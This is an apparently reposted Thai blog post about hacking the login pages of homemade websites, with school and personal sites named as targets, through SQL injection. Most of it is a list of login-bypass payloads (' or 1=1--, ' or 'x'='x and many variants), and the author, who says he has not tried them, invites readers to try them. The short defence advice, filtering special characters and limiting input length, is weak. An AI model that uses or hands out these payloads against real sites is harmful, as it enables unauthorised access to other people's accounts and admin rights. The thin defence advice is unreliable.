อันนี้เป็นการ Hack เว็บที่ใช้ฐานข้อมูลเป็น SQL ซึ่งตามที่ต่างๆก็จะอุด Bug ตรงส่วนนี้ไว้เรียบร้อยแล้ว
แต่ก็มีบางเว็บ site (Script เขียนเองซึ่งมักจะเป็นเว็บไซต์ของโรงเรียนหรือเว็บส่วนบุคคล) ที่มักจะมีรูรั่วนี้
ออกมาให้เห็น
หลังจากที่การ Login ค่าที่เป็นไปได้หลังจากการ login ก็คือ
1.ได้รับสิทธิ์ของ User นั้นๆ
2.ได้รับสิทธ์เท่ากับคนอื่นๆ
3.ได้รับสิทธ์เป็นผู้ใช้ที่อยู่อันดับแรกหรือท้ายของตาราง (admin)
4. ไม่ได้อะไร
นอกจากการอัดฉีดคำสั่งเหล่านี้ลงไปแล้วนั้นยังมีคำสั่งอื่นๆที่สามารถอัดลงไปได้อีกเ
ช่น
SELECT * FROM User WHERE
SELECT * FROM * WHERE
'GROUP BY username;--
'employee.feild'
เป็นต้นซึ่งเป็นคำสั่ง SQL สามารถหาความรู้ได้จากที่ต่างๆใน internet
การป้องกันโดยพื้นฐานนั้นก็คือการกรองค่าอักขระแบบแปลกๆออกไปจากข้อความที่รับเข้ามา
เช่น
&!@#$%^ เป็นต้นหรือการจำกัดความยาวของช่องรับข้อความก็เป็นอีกหนึ่งวิธีที่น่าสนใจ
or''='
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
ผมก็ยังไม่ได้ลอง ไปเจอมา เลยนำมาฝากกันลองดู
เครดิต www.viruscom2.com
ไม่มีความคิดเห็น:
แสดงความคิดเห็น